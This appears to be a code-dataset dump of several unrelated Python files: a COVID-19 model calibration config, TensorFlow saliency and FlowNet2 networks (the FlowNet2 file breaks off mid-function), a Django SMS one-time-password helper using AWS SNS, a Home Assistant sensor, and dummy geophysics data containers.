id
stringlengths 1
7
| text
stringlengths 6
1.03M
| dataset_id
stringclasses 1
value |
---|---|---|
3372757
|
<reponame>monash-emu/AuTuMN
from autumn.tools.project import Project, ParameterSet, TimeSeriesSet, build_rel_path
from autumn.tools.calibration import Calibration
from autumn.tools.calibration.priors import UniformPrior, BetaPrior
from autumn.tools.calibration.targets import (
NormalTarget,
get_dispersion_priors_for_gaussian_targets,
)
from autumn.models.covid_19 import base_params, build_model
from autumn.settings import Region, Models
from autumn.projects.covid_19.calibration import COVID_GLOBAL_PRIORS
# Load and configure model parameters.
malaysia_path = build_rel_path("../malaysia/params/default.yml")
default_path = build_rel_path("params/default.yml")
scenario_paths = [build_rel_path(f"params/scenario-{i}.yml") for i in range(10, 12)]
mle_path = build_rel_path("params/mle-params.yml")
baseline_params = (
base_params.update(malaysia_path).update(default_path).update(mle_path, calibration_format=True)
)
scenario_params = [baseline_params.update(p) for p in scenario_paths]
param_set = ParameterSet(baseline=baseline_params, scenarios=scenario_params)
ts_set = TimeSeriesSet.from_file(build_rel_path("timeseries.json"))
notifications_ts = ts_set.get("notifications").truncate_start_time(270)
targets = [NormalTarget(notifications_ts)]
priors = [
# Global COVID priors
*COVID_GLOBAL_PRIORS,
# Dispersion parameters based on targets
*get_dispersion_priors_for_gaussian_targets(targets),
# Regional parameters
UniformPrior("contact_rate", [0.015, 0.06]),
UniformPrior("infectious_seed", [30.0, 200.0]),
# Detection
UniformPrior("testing_to_detection.assumed_cdr_parameter", [0.03, 0.15]),
# Microdistancing
UniformPrior("mobility.microdistancing.behaviour.parameters.upper_asymptote", [0.1, 0.4]),
# Health system-related
UniformPrior("clinical_stratification.props.hospital.multiplier", [0.7, 1.3]),
UniformPrior("clinical_stratification.icu_prop", [0.12, 0.25]),
UniformPrior("clinical_stratification.non_sympt_infect_multiplier", [0.15, 0.4]),
UniformPrior("clinical_stratification.props.symptomatic.multiplier", [0.8, 2.0]),
UniformPrior("vaccination.coverage_override", [0.0, 1.0], sampling="lhs"),
BetaPrior("vaccination.one_dose.vacc_prop_prevent_infection", mean=0.7, ci=[0.5, 0.9], sampling="lhs"),
UniformPrior("vaccination.one_dose.overall_efficacy", [0.0, 1.0], sampling="lhs"),
UniformPrior("voc_emergence.alpha_beta.contact_rate_multiplier", [1.0, 3.0]),
UniformPrior("voc_emergence.delta.contact_rate_multiplier", [2.0, 5.0]),
UniformPrior("voc_emergence.alpha_beta.start_time", [275, 450]),
UniformPrior("voc_emergence.delta.start_time", [450, 600]),
]
calibration = Calibration(priors, targets)
# FIXME: Replace with flexible Python plot request API.
import json
plot_spec_filepath = build_rel_path("timeseries.json")
with open(plot_spec_filepath) as f:
plot_spec = json.load(f)
project = Project(
Region.SELANGOR, Models.COVID_19, build_model, param_set, calibration, plots=plot_spec
)
|
StarcoderdataPython
|
1763591
|
<gh_stars>1-10
#-*- coding: utf-8 -*-
"""
saliency_model.py
This class implements a shallow convnet saliency prediction model [1].
The input is a 96x96 image, and the output is a 48*48 saliency map.
[1] <NAME>., <NAME>., <NAME>., <NAME>. and <NAME>.
Shallow and Deep Convolutional Networks for Saliency Prediction. In CVPR 2016.
"""
from models.base import ModelBase, BaseModelConfig
import numpy as np
from util import log
import os, os.path
import sys
import time
import tensorflow as tf
from itertools import chain
from tensorflow.contrib.layers.python.layers import (
initializers,
convolution2d, fully_connected
)
import tflearn.layers
import salicon_input_data
import crc_input_data_seq as crc_input_data
from models.model_util import tf_normalize_map
import evaluation_metrics
class SaliencyModel(ModelBase):
def __init__(self,
session,
data_sets,
config=BaseModelConfig()
):
self.session = session
self.data_sets = data_sets
self.config = config
super(SaliencyModel, self).__init__(config)
# other configuration
self.batch_size = config.batch_size
self.initial_learning_rate = config.initial_learning_rate
self.max_grad_norm = config.max_grad_norm
# Finally, build the model and optimizer
self.build_model()
self.build_train_op()
self.prepare_data()
self.session.run(tf.initialize_all_variables())
# learning rate decay
def _build_learning_rate(self):
#return tf.train.exponential_decay(
# self.initial_learning_rate,
# global_step = self.global_step,
# decay_steps = len(self.data_sets.train.images) / self.batch_size,
# decay_rate = 0.995, # per one epoch
# staircase = True,
# name="var_lr"
#)
return tf.Variable(self.initial_learning_rate,
name="var_lr", trainable=False)
@staticmethod
def create_shallownet(images, scope=None, net=None, dropout=True):
"""
Args:
images: a tensor of shape [B x H x W x C]
net: An optional dict object
scope: The variable scope for the subgraph, defaults to ShallowNet
Returns:
saliency_output: a tensor of shape [B x 48 x 48]
"""
assert len(images.get_shape()) == 4 # [B, H, W, C]
if net is None: net = {}
else: assert isinstance(net, dict)
net['dropout_keep_prob'] = tf.placeholder(tf.float32, name='dropout_keep_prob')
with tf.variable_scope(scope or 'ShallowNet'):
# CONV
net['conv1'] = convolution2d(images, 64,
kernel_size=(5, 5), stride=(1, 1), padding='VALID',
activation_fn=None,#tf.nn.relu,
weight_init=initializers.xavier_initializer_conv2d(uniform=True),
bias_init=tf.constant_initializer(0.0),
weight_collections=['MODEL_VARS'], bias_collections=['MODEL_VARS'],
name='conv1')
net['conv1'] = tflearn.layers.batch_normalization(net['conv1'])
net['conv1'] = tf.nn.relu(net['conv1'])
net['pool1'] = tf.nn.max_pool(net['conv1'], ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', name='pool1')
log.info('Conv1 size : %s', net['conv1'].get_shape().as_list())
log.info('Pool1 size : %s', net['pool1'].get_shape().as_list())
net['conv2'] = convolution2d(net['pool1'], 128,
kernel_size=(3, 3), stride=(1, 1), padding='VALID',
activation_fn=None,#tf.nn.relu,
weight_init=initializers.xavier_initializer_conv2d(uniform=True),
bias_init=tf.constant_initializer(0.0),
weight_collections=['MODEL_VARS'], bias_collections=['MODEL_VARS'],
name='conv2')
net['conv2'] = tflearn.layers.batch_normalization(net['conv2'])
net['conv2'] = tf.nn.relu(net['conv2'])
net['pool2'] = tf.nn.max_pool(net['conv2'], ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1],
padding='SAME', name='pool2')
log.info('Conv2 size : %s', net['conv2'].get_shape().as_list())
log.info('Pool2 size : %s', net['pool2'].get_shape().as_list())
net['conv3'] = convolution2d(net['pool2'], 128,
kernel_size=(3, 3), stride=(1, 1), padding='VALID',
activation_fn=None,#tf.nn.relu,
weight_init=initializers.xavier_initializer_conv2d(uniform=True),
bias_init=tf.constant_initializer(0.0),
weight_collections=['MODEL_VARS'], bias_collections=['MODEL_VARS'],
name='conv3')
net['conv3'] = tflearn.layers.batch_normalization(net['conv3'])
net['conv3'] = tf.nn.relu(net['conv3'])
net['pool3'] = tf.nn.max_pool(net['conv3'], ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1],
padding='SAME', name='pool3')
log.info('Conv3 size : %s', net['conv3'].get_shape().as_list())
log.info('Pool3 size : %s', net['pool3'].get_shape().as_list())
# FC layer
n_inputs = int(np.prod(net['pool3'].get_shape().as_list()[1:]))
pool3_flat = tf.reshape(net['pool3'], [-1, n_inputs])
net['fc1'] = fully_connected(pool3_flat, 98,
activation_fn=None,#tf.nn.relu,
weight_init=initializers.xavier_initializer(uniform=True),
bias_init=tf.constant_initializer(0.0),
weight_collections=['MODEL_VARS'], bias_collections=['MODEL_VARS'],
name='fc1')
log.info('fc1 size : %s', net['fc1'].get_shape().as_list())
net['fc1'] = tflearn.layers.batch_normalization(net['fc1'])
net['fc1'] = tf.nn.relu(net['fc1'])
if dropout:
net['fc1'] = tf.nn.dropout( net['fc1'], net['dropout_keep_prob'] )
fc1_slice1, fc1_slice2 = tf.split(1, 2, net['fc1'], name='fc1_slice')
net['max_out'] = tf.maximum(fc1_slice1, fc1_slice2, name='fc1_maxout')
log.info('maxout size : %s', net['max_out'].get_shape().as_list())
net['fc2'] = fully_connected(net['max_out'], 98 ,
activation_fn=None, # no relu here
weight_init=initializers.xavier_initializer(uniform=True),
bias_init=tf.constant_initializer(0.0),
weight_collections=['MODEL_VARS'], bias_collections=['MODEL_VARS'],
name='fc2')
net['fc2'] = tflearn.layers.batch_normalization(net['fc2'])
net['fc2'] = tf.nn.relu(net['fc2'])
#if dropout:
# net['fc2'] = tf.nn.dropout( net['fc2'], net['dropout_keep_prob'] )
log.info('fc2 size : %s', net['fc2'].get_shape().as_list())
fc2_slice1, fc2_slice2 = tf.split(1, 2, net['fc2'], name='fc2_slice')
net['max_out2'] = tf.maximum(fc2_slice1, fc2_slice2, name='fc2_maxout')
# debug and summary
#net['fc1'].get_shape().assert_is_compatible_with([None, 4802])
#net['fc2'].get_shape().assert_is_compatible_with([None, 4802])
#net['fc3'].get_shape().assert_is_compatible_with([None, 4802])
#for t in [self.conv1, self.conv2, self.conv3,
# self.pool1, self.pool2, self.pool3,
# self.fc1, self.max_out, self.fc2]:
# _add_activation_histogram_summary(t)
net['saliency'] = tf.reshape(net['max_out2'], [-1, 7, 7],
name='saliency')
return net['saliency']
def build_model(self):
self.images = tf.placeholder(tf.float32, shape=(None, 98, 98, 3))
log.info('images : %s', self.images.get_shape().as_list())
# saliency maps (GT)
self.saliencymaps_gt = tf.placeholder(tf.float32, shape=(None, 7, 7))
log.info('gt_saliencymaps : %s', self.saliencymaps_gt.get_shape().as_list())
# shallow net (inference)
net = {}
self.saliency_output = SaliencyModel.create_shallownet(
self.images,
net=net
)
self.dropout_keep_prob = net['dropout_keep_prob']
log.info('saliency output: %s', self.saliency_output.get_shape().as_list())
def _add_activation_histogram_summary(tensor):
# WARNING: This summary WILL MAKE LEARNING EXTREMELY SLOW
tf.histogram_summary(tensor.name + '/activation', tensor)
tf.histogram_summary(tensor.name + '/sparsity', tf.nn.zero_fraction(tensor))
if hasattr(tensor, 'W'): tf.histogram_summary(tensor.name + '/W', tensor.W)
if hasattr(tensor, 'b'): tf.histogram_summary(tensor.name + '/b', tensor.b)
# build euclidean loss
self.reg_loss = 1e-7 * sum([tf.nn.l2_loss(t) for t in tf.get_collection('MODEL_VARS')])
self.target_loss = 2.0 * tf.nn.l2_loss(self.saliency_output - self.saliencymaps_gt) / (7 * 7)
self.target_loss = tf.div(self.target_loss, self.batch_size, name='loss_normalized')
self.loss = self.reg_loss + self.target_loss
tf.scalar_summary('loss/total/train', self.loss)
tf.scalar_summary('loss/total/val', self.loss, collections=['TEST_SUMMARIES'])
tf.scalar_summary('loss/target/train', self.target_loss)
tf.scalar_summary('loss/target/val', self.target_loss, collections=['TEST_SUMMARIES'])
# Debugging Informations
# ----------------------
# OPTIONAL: for debugging and visualization
def _add_image_summary(tag, tensor):
return tf.image_summary(tag, tensor, max_images=2, collections=['IMAGE_SUMMARIES'])
_add_image_summary('inputimage', self.images)
_add_image_summary('saliency_maps_gt', tf.expand_dims(self.saliencymaps_gt, 3))
_add_image_summary('saliency_maps_pred_original',
tf.reshape(self.saliency_output, [-1, 7, 7, 1]))
_add_image_summary('saliency_maps_pred_norm',
tf.reshape(tf_normalize_map(self.saliency_output), [-1, 7, 7, 1]))
# normalize_map -> tf_normalize_map
self.image_summaries = tf.merge_summary(
inputs = tf.get_collection('IMAGE_SUMMARIES'),
collections = [],
name = 'merged_image_summary',
)
# activations
self.model_var_summaries = tf.merge_summary([
tf.histogram_summary(var.name, var, collections=[]) \
for var in tf.get_collection('MODEL_VARS')
])
def prepare_data(self):
self.n_train_instances = len(self.data_sets.train.images)
def single_step(self, train_mode=True):
_start_time = time.time()
""" prepare the input (get batch-style tensor) """
_dataset = train_mode and self.data_sets.train \
or self.data_sets.valid
batch_images, batch_saliencymaps = _dataset.next_batch(self.batch_size)[:2]
if len(batch_images[0].shape) == 4:
# maybe, temporal axis is given [B x T x 96 x 96 x 3]
# in the plain saliency model, we concatenate all of them
# to learn/evaluate accuracy across frame independently.
batch_images = np.concatenate(batch_images)
batch_saliencymaps = np.concatenate(batch_saliencymaps)
# Flip half of the images in this batch at random:
if train_mode and self.config.use_flip_batch:
batch_size = len(batch_images)
indices = np.random.choice(batch_size, batch_size / 2, replace=False)
batch_images[indices, :] = batch_images[indices, :, ::-1, :]
batch_saliencymaps[indices, :] = batch_saliencymaps[indices, :, ::-1]
""" run the optimization step """
_merged_summary = {True: self.merged_summary_train,
False: self.merged_summary_val}[train_mode]
eval_targets = [self.loss, self.target_loss, self.reg_loss, _merged_summary]
if train_mode: eval_targets += [self.train_op]
if not train_mode:
eval_targets += [self.image_summaries]
eval_targets += [self.model_var_summaries]
eval_result = dict(zip(eval_targets, self.session.run(
eval_targets,
feed_dict = {
self.images : batch_images,
self.saliencymaps_gt : batch_saliencymaps,
self.dropout_keep_prob : 0.4 if train_mode else 1.0
}
)))
loss = eval_result[self.loss]
target_loss = eval_result[self.target_loss]
reg_loss = eval_result[self.reg_loss]
summary = eval_result[_merged_summary]
step = self.current_step
epoch = float(step * self.batch_size) / self.n_train_instances # estimated epoch
if step >= 20:
self.writer.add_summary(summary, step)
if not train_mode:
image_summary = eval_result[self.image_summaries]
self.writer.add_summary(image_summary, step)
var_summary = eval_result[self.model_var_summaries]
self.writer.add_summary(var_summary, step)
_end_time = time.time()
if (not train_mode) or np.mod(step, self.config.steps_per_logprint) == 0:
log_fn = (train_mode and log.info or log.infov)
log_fn((" [{split_mode:5} epoch {epoch:.1f} / step {step:4d}] " +
"batch total-loss: {total_loss:.5f}, target-loss: {target_loss:.5f} " +
"({sec_per_batch:.3f} sec/batch, {instance_per_sec:.3f} instances/sec)"
).format(split_mode=(train_mode and 'train' or 'val'),
epoch=epoch, step=step,
total_loss=loss, target_loss=target_loss,
sec_per_batch=(_end_time - _start_time),
instance_per_sec=self.batch_size / (_end_time - _start_time)
)
)
return step
def evaluate(self, dataset):
num_steps = len(dataset) / self.batch_size
gt_maps = [] # GT saliency maps (each 48x48)
pred_maps = [] # predicted saliency maps (each 48x48)
fixation_maps = []
for v in range(num_steps):
if v % 10 == 0: log.info('Evaluating step %d ...', v)
batch_images, batch_saliencymaps, batch_fixationmaps = \
dataset.next_batch(self.batch_size)[:3]
if len(batch_images[0].shape) == 4:
# maybe, temporal axis is given [B x T x 96 x 96 x 3]
# in the plain saliency model, we concatenate all of them
# to learn/evaluate accuracy across frame independently.
batch_images = np.concatenate(batch_images)
batch_saliencymaps = np.concatenate(batch_saliencymaps)
batch_fixationmaps = chain(*batch_fixationmaps)
[saliency_output, ] = self.session.run(
[self.saliency_output, ],
feed_dict = {
self.images : batch_images,
self.saliencymaps_gt : batch_saliencymaps,
self.dropout_keep_prob : 1.0
})
saliency_output = saliency_output.reshape(-1, 7, 7)
assert len(saliency_output) == len(batch_saliencymaps)
gt_maps.extend(batch_saliencymaps)
pred_maps.extend(saliency_output)
fixation_maps.extend(batch_fixationmaps)
# Evaluate.
batch_scores = {}
log.infov('Validation on total %d images', len(pred_maps))
for metric in evaluation_metrics.AVAILABLE_METRICS:
batch_scores[metric] = evaluation_metrics.saliency_score(metric, pred_maps, gt_maps, fixation_maps)
log.infov('Saliency %s : %f', metric, batch_scores[metric])
self.report_evaluate_summary(batch_scores)
def self_test(args):
global model, data_sets
session = tf.Session(config=tf.ConfigProto(
gpu_options=tf.GPUOptions(per_process_gpu_memory_fraction=0.5),
device_count={'GPU': True}, # self-testing: NO GPU, USE CPU
))
log.warn('Loading %s input data ...', args.dataset)
if args.dataset == 'salicon':
data_sets = salicon_input_data.read_salicon_data_sets(
98, 98, 7, 7, np.float32,
use_example=False, # only tens
use_val_split=True,
) # self test small only
elif args.dataset == 'crc':
data_sets = crc_input_data.read_crc_data_sets(
98, 98, 7, 7, np.float32,
use_cache=True
)
else:
raise ValueError('Unknown dataset : %s' % args.dataset)
print 'Train', data_sets.train
print 'Validation', data_sets.valid
log.warn('Building Model ...')
# default configuration as of now
config = BaseModelConfig()
config.train_dir = args.train_dir
if args.train_tag:
config.train_tag = args.train_tag
config.batch_size = 200
config.use_flip_batch = True
#config.initial_learning_rate = 0.03
config.initial_learning_rate = 0.00003
config.optimization_method = 'adam'
config.steps_per_evaluation = 7000 # for debugging
if args.learning_rate is not None:
config.initial_learning_rate = float(args.learning_rate)
if args.learning_rate_decay is not None:
config.learning_rate_decay = float(args.learning_rate_decay)
if args.batch_size is not None:
config.batch_size = int(args.batch_size)
if args.max_steps:
config.max_steps = int(args.max_steps)
if args.dataset == 'crc':
config.batch_size = 2 # because of T~=35
config.steps_per_evaluation = 200
config.dump(sys.stdout)
log.warn('Start Fitting Model ...')
model = SaliencyModel(session, data_sets, config)
print model
model.fit()
log.warn('Fitting Done. Evaluating!')
model.evaluate(data_sets.test)
#session.close()
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--dataset', default='salicon', help='[salicon, crc]')
parser.add_argument('--max_steps', default=None, type=int)
parser.add_argument('--batch_size', default=None, type=int)
parser.add_argument('--train_dir', default=None, type=str)
parser.add_argument('--train_tag', '--tag', default=None, type=str)
parser.add_argument('--learning_rate', default=None, type=float)
parser.add_argument('--learning_rate_decay', default=None, type=float)
args = parser.parse_args()
self_test(args)
|
StarcoderdataPython
|
1779837
|
<gh_stars>0
from constants import *
from game_utility import *
def game_verb_check_results(game):
needs = game[IDX_todolist]
if len(needs) == 0:
message = ' checks the ingredient list, and points out we have everything we need. Well done, team!\n\n'
message += 'Congratulations on finishing a Chef Quest! You finished at ' + time_of_day(game[IDX_time])
message += '. Play again and see if you can do it faster!\n\nYou are now back in the Lobby. '
message += '[create] and new game, or [join] an existing one (leave the name blank to see what is available)'
return message
message = ' checks the ingredient list, and figures we still need to find:'
for name, amnt in needs.iteritems():
message += '\n' + str(amnt) + ' x ' + name
return message
|
StarcoderdataPython
|
1728725
|
<filename>ax3_OTP_Auth/hotp.py
from secrets import token_urlsafe
from django.core.cache import cache
from django.utils.module_loading import import_string
import boto3
import pyotp
from . import settings
class HOTP:
def __init__(self, unique_id: str, digits: int = 6):
self._unique_id = unique_id
self._digits = digits
self._ttl = settings.OTP_AUTH_TTL
def _create_secret(self, secret: str) -> str:
cache.set('{}.secret'.format(self._unique_id), secret, timeout=self._ttl)
return secret
def _create_counter(self) -> str:
try:
cache.incr('{}.counter'.format(self._unique_id))
except ValueError:
cache.set('{}.counter'.format(self._unique_id), 1, timeout=self._ttl)
return cache.get('{}.counter'.format(self._unique_id))
def _create_token(self, phone_number: int) -> str:
token = token_urlsafe()
cache.set(token, phone_number, timeout=self._ttl)
return token
def _get_secret(self):
return cache.get('{}.secret'.format(self._unique_id))
def _get_counter(self):
return cache.get('{}.counter'.format(self._unique_id))
def _send_sms(self, sms_code: int, country_code: str, phone_number: int):
message = settings.OTP_AUTH_MESSAGE.format(sms_code)
if settings.OTP_CUSTOM_SMS_GATEWAY:
gateway = import_string(settings.OTP_CUSTOM_SMS_GATEWAY)
gateway(country_code=country_code, phone_number=phone_number, message=message)
else:
sns = boto3.client(
'sns',
aws_access_key_id=settings.AWS_ACCESS_KEY_ID,
aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY,
region_name=settings.AWS_DEFAULT_REGION
)
sns.publish(
PhoneNumber=f'+{country_code}{phone_number}',
Message=message,
MessageAttributes={
'AWS.SNS.SMS.SMSType': {
'DataType': 'String',
'StringValue': 'Transactional'
}
}
)
def create(self, country_code: str, phone_number: int):
secret = self._create_secret(secret=pyotp.random_base32(length=32))
counter = self._create_counter()
hotp = pyotp.HOTP(secret, digits=self._digits)
self._send_sms(
sms_code=hotp.at(counter),
country_code=country_code,
phone_number=phone_number
)
def verify(self, sms_code: int, phone_number: int) -> str:
secret = self._get_secret()
count = self._get_counter()
if count and secret:
hotp = pyotp.HOTP(secret, digits=self._digits)
if hotp.verify(sms_code, count):
return self._create_token(phone_number=phone_number)
return None
def get_phone_number(self, token: str) -> int:
phone_number = cache.get(token)
cache.delete(token)
cache.delete_pattern('{}.*'.format(self._unique_id))
return phone_number
|
StarcoderdataPython
|
1635149
|
<gh_stars>1-10
"""Sensor platform for NorwegianWeather."""
import logging
from .const import DOMAIN
from .entity import NorwegianWeatherEntity
_LOGGER: logging.Logger = logging.getLogger(__package__)
async def async_setup_entry(hass, entry, async_add_devices):
"""Setup sensor platform."""
coordinator = hass.data[DOMAIN][entry.entry_id]
entities = coordinator.get_sensor_entities()
_LOGGER.debug(
f"Setting up sensor platform for {coordinator.place}, {len(entities)} entities"
)
async_add_devices(entities)
class NorwegianWeatherSensor(NorwegianWeatherEntity):
"""NorwegianWeather Sensor class."""
@property
def state(self):
"""Return the state of the sensor."""
return self._state
|
StarcoderdataPython
|
3268925
|
<reponame>j-gallistl/reda
"""Dummy data containers for testing purposes."""
import pandas as pd
import numpy as np
import reda
# construct a simple container using random numbers
df = pd.DataFrame(columns=list("abmnr"))
df.a = np.arange(1, 23)
df.b = df.a + 1
df.m = df.a + 2
df.n = df.b + 2
np.random.seed(0)
df.r = np.random.randn(len(df.r))
ERTContainer = reda.ERT(data=df)
# construct an ERT container with normal and reciprocal data
df = pd.DataFrame(
[
# normals
(0, 1, 2, 4, 3, 1.1),
(0, 1, 2, 5, 4, 1.2),
(0, 1, 2, 6, 5, 1.3),
(0, 1, 2, 7, 6, 1.4),
(0, 2, 3, 5, 4, 1.5),
(0, 2, 3, 6, 5, 1.6),
(0, 2, 3, 7, 6, 1.7),
(0, 3, 4, 6, 5, 1.8),
(0, 3, 4, 7, 6, 1.9),
(0, 4, 5, 7, 6, 2.0),
# reciprocals
(0, 4, 3, 1, 2, 1.1),
(0, 5, 4, 1, 2, 1.2),
(0, 6, 5, 1, 2, 1.3),
(0, 7, 6, 1, 2, 1.4),
(0, 5, 4, 2, 3, 1.5),
(0, 6, 5, 2, 3, 1.6),
(0, 7, 6, 2, 3, 1.7),
(0, 6, 5, 3, 4, 1.8),
(0, 7, 6, 3, 4, 1.9),
(0, 7, 6, 4, 5, 2.0),
],
columns=[
'timestep',
'a',
'b',
'm',
'n',
'r',
]
)
# now add gaussian noise to the reciprocals
df.loc[10:20, 'r'] += np.random.randn(10)
ERTContainer_nr = reda.ERT(data=df)
|
StarcoderdataPython
|
19773
|
import glob, os
import numpy as np
import tensorflow as tf
import tensorflow.contrib.graph_editor as ge
class Flownet2:
def __init__(self, bilinear_warping_module):
self.weights = dict()
for key, shape in self.all_variables():
self.weights[key] = tf.get_variable(key, shape=shape)
self.bilinear_warping_module = bilinear_warping_module
def leaky_relu(self, x, s):
assert s > 0 and s < 1, "Wrong s"
return tf.maximum(x, s*x)
def warp(self, x, flow):
return self.bilinear_warping_module.bilinear_warping(x, tf.stack([flow[:,:,:,1], flow[:,:,:,0]], axis=3))
# flip true -> [:,:,:,0] y axis downwards
# [:,:,:,1] x axis
# as in matrix indexing
#
# false returns 0->x, 1->y
def __call__(self, im0, im1, flip=True):
f = self.get_blobs(im0, im1)['predict_flow_final']
if flip:
f = tf.stack([f[:,:,:,1], f[:,:,:,0]], axis=3)
return f
def get_optimizer(self, flow, target, learning_rate=1e-4):
#flow = self.__call__(im0, im1)
loss = tf.reduce_sum(flow * target) # target holding the gradients!
opt = tf.train.AdamOptimizer(learning_rate=learning_rate, beta1=0.95, beta2=0.99, epsilon=1e-8)
opt = opt.minimize(loss, var_list=
# [v for k,v in self.weights.iteritems() if (k.startswith('net3_') or k.startswith('netsd_') or k.startswith('fuse_'))])
[v for k,v in self.weights.iteritems() if ((k.startswith('net3_') or k.startswith('netsd_') or k.startswith('fuse_')) and not ('upsample' in k or 'deconv' in k))])
return opt, loss
# If I run the network with large images (1024x2048) it crashes due to memory
# constraints on a 12Gb titan X.
# See https://github.com/tensorflow/tensorflow/issues/5816#issuecomment-268710077
# for a possible explanation. I fix it by adding run_after in the section with
# the correlation layer so that 441 large tensors are not allocated at the same time
def run_after(self, a_tensor, b_tensor):
"""Force a to run after b"""
ge.reroute.add_control_inputs(a_tensor.op, [b_tensor.op])
# without epsilon I get nan-errors when I backpropagate
def l2_norm(self, x):
return tf.sqrt(tf.maximum(1e-5, tf.reduce_sum(x**2, axis=3, keep_dims=True)))
def get_blobs(self, im0, im1):
blobs = dict()
batch_size = tf.to_int32(tf.shape(im0)[0])
width = tf.to_int32(tf.shape(im0)[2])
height = tf.to_int32(tf.shape(im0)[1])
TARGET_WIDTH = width
TARGET_HEIGHT = height
divisor = 64.
ADAPTED_WIDTH = tf.to_int32(tf.ceil(tf.to_float(width)/divisor) * divisor)
ADAPTED_HEIGHT = tf.to_int32(tf.ceil(tf.to_float(height)/divisor) * divisor)
SCALE_WIDTH = tf.to_float(width) / tf.to_float(ADAPTED_WIDTH);
SCALE_HEIGHT = tf.to_float(height) / tf.to_float(ADAPTED_HEIGHT);
blobs['img0'] = im0
blobs['img1'] = im1
blobs['img0s'] = blobs['img0']*0.00392156862745098
blobs['img1s'] = blobs['img1']*0.00392156862745098
#mean = np.array([0.411451, 0.432060, 0.450141])
mean = np.array([0.37655231, 0.39534855, 0.40119368])
blobs['img0_nomean'] = blobs['img0s'] - mean
blobs['img1_nomean'] = blobs['img1s'] - mean
blobs['img0_nomean_resize'] = tf.image.resize_bilinear(blobs['img0_nomean'], size=[ADAPTED_HEIGHT, ADAPTED_WIDTH], align_corners=True)
blobs['img1_nomean_resize'] = tf.image.resize_bilinear(blobs['img1_nomean'], size=[ADAPTED_HEIGHT, ADAPTED_WIDTH], align_corners=True)
blobs['conv1a'] = tf.pad(blobs['img0_nomean_resize'], [[0,0], [3,3], [3,3], [0,0]])
blobs['conv1a'] = tf.nn.conv2d(blobs['conv1a'], self.weights['conv1_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv1_b']
blobs['conv1a'] = self.leaky_relu(blobs['conv1a'], 0.1)
blobs['conv1b'] = tf.pad(blobs['img1_nomean_resize'], [[0,0], [3,3], [3,3], [0,0]])
blobs['conv1b'] = tf.nn.conv2d(blobs['conv1b'], self.weights['conv1_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv1_b']
blobs['conv1b'] = self.leaky_relu(blobs['conv1b'], 0.1)
blobs['conv2a'] = tf.pad(blobs['conv1a'], [[0,0], [2,2], [2,2], [0,0]])
blobs['conv2a'] = tf.nn.conv2d(blobs['conv2a'], self.weights['conv2_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv2_b']
blobs['conv2a'] = self.leaky_relu(blobs['conv2a'], 0.1)
blobs['conv2b'] = tf.pad(blobs['conv1b'], [[0,0], [2,2], [2,2], [0,0]])
blobs['conv2b'] = tf.nn.conv2d(blobs['conv2b'], self.weights['conv2_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv2_b']
blobs['conv2b'] = self.leaky_relu(blobs['conv2b'], 0.1)
blobs['conv3a'] = tf.pad(blobs['conv2a'], [[0,0], [2,2], [2,2], [0,0]])
blobs['conv3a'] = tf.nn.conv2d(blobs['conv3a'], self.weights['conv3_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv3_b']
blobs['conv3a'] = self.leaky_relu(blobs['conv3a'], 0.1)
blobs['conv3b'] = tf.pad(blobs['conv2b'], [[0,0], [2,2], [2,2], [0,0]])
blobs['conv3b'] = tf.nn.conv2d(blobs['conv3b'], self.weights['conv3_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv3_b']
blobs['conv3b'] = self.leaky_relu(blobs['conv3b'], 0.1)
# this might be considered a bit hacky
tmp = []
x1_l = []
x2_l = []
for di in range(-20, 21, 2):
for dj in range(-20, 21, 2):
x1 = tf.pad(blobs['conv3a'], [[0,0], [20,20], [20,20], [0,0]])
x2 = tf.pad(blobs['conv3b'], [[0,0], [20-di,20+di], [20-dj,20+dj], [0,0]])
x1_l.append(x1)
x2_l.append(x2)
c = tf.nn.conv2d(x1*x2, tf.ones([1, 1, 256, 1])/256., strides=[1,1,1,1], padding='VALID')
tmp.append(c[:,20:-20,20:-20,:])
for i in range(len(tmp)-1):
#self.run_after(tmp[i], tmp[i+1])
self.run_after(x1_l[i], tmp[i+1])
self.run_after(x2_l[i], tmp[i+1])
blobs['corr'] = tf.concat(tmp, axis=3)
blobs['corr'] = self.leaky_relu(blobs['corr'], 0.1)
blobs['conv_redir'] = tf.nn.conv2d(blobs['conv3a'], self.weights['conv_redir_w'], strides=[1,1,1,1], padding="VALID") + self.weights['conv_redir_b']
blobs['conv_redir'] = self.leaky_relu(blobs['conv_redir'], 0.1)
blobs['blob16'] = tf.concat([blobs['conv_redir'], blobs['corr']], axis=3)
blobs['conv3_1'] = tf.nn.conv2d(blobs['blob16'], self.weights['conv3_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['conv3_1_b']
blobs['conv3_1'] = self.leaky_relu(blobs['conv3_1'], 0.1)
blobs['conv4'] = tf.pad(blobs['conv3_1'], [[0,0], [1,1], [1,1], [0,0]])
blobs['conv4'] = tf.nn.conv2d(blobs['conv4'], self.weights['conv4_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv4_b']
blobs['conv4'] = self.leaky_relu(blobs['conv4'], 0.1)
blobs['conv4_1'] = tf.nn.conv2d(blobs['conv4'], self.weights['conv4_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['conv4_1_b']
blobs['conv4_1'] = self.leaky_relu(blobs['conv4_1'], 0.1)
blobs['conv5'] = tf.pad(blobs['conv4_1'], [[0,0], [1,1], [1,1], [0,0]])
blobs['conv5'] = tf.nn.conv2d(blobs['conv5'], self.weights['conv5_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv5_b']
blobs['conv5'] = self.leaky_relu(blobs['conv5'], 0.1)
blobs['conv5_1'] = tf.nn.conv2d(blobs['conv5'], self.weights['conv5_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['conv5_1_b']
blobs['conv5_1'] = self.leaky_relu(blobs['conv5_1'], 0.1)
blobs['conv6'] = tf.pad(blobs['conv5_1'], [[0,0], [1,1], [1,1], [0,0]])
